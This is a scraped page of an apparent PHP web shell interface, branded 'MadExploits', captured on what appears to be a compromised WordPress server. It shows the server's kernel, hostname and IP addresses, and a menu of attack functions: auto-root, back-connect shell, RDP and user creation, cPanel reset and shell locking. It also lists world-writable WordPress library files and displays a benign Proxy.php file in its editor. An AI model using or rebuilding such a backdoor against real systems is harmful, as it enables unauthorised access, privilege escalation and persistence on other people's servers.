Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.135.205.102
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms /
wp-includes /
Requests /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxrwxrwx
Cookie
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
Proxy
[ DIR ]
drwxrwxrwx
Response
[ DIR ]
drwxrwxrwx
Transport
[ DIR ]
drwxrwxrwx
Utility
[ DIR ]
drwxrwxrwx
Auth.php
860
B
-rwxrwxrwx
Autoload.php
9.12
KB
-rwxrwxrwx
Capability.php
657
B
-rwxrwxrwx
Cookie.php
14.13
KB
-rwxrwxrwx
Exception.php
1.09
KB
-rwxrwxrwx
HookManager.php
709
B
-rwxrwxrwx
Hooks.php
2.96
KB
-rwxrwxrwx
IdnaEncoder.php
12.07
KB
-rwxrwxrwx
Ipv6.php
5.51
KB
-rwxrwxrwx
Iri.php
28.91
KB
-rwxrwxrwx
Port.php
1.47
KB
-rwxrwxrwx
Proxy.php
867
B
-rwxrwxrwx
Requests.php
33.17
KB
-rwxrwxrwx
Response.php
4.14
KB
-rwxrwxrwx
Session.php
8.89
KB
-rwxrwxrwx
Ssl.php
5.3
KB
-rwxrwxrwx
Transport.php
1.51
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Proxy.php
<?php /** * Proxy connection interface * * @package Requests\Proxy * @since 1.6 */ namespace WpOrg\Requests; use WpOrg\Requests\Hooks; /** * Proxy connection interface * * Implement this interface to handle proxy settings and authentication * * Parameters should be passed via the constructor where possible, as this * makes it much easier for users to use your provider. * * @see \WpOrg\Requests\Hooks * * @package Requests\Proxy * @since 1.6 */ interface Proxy { /** * Register hooks as needed * * This method is called in {@see \WpOrg\Requests\Requests::request()} when the user * has set an instance as the 'auth' option. Use this callback to register all the * hooks you'll need. * * @see \WpOrg\Requests\Hooks::register() * @param \WpOrg\Requests\Hooks $hooks Hook system */ public function register(Hooks $hooks); }
Close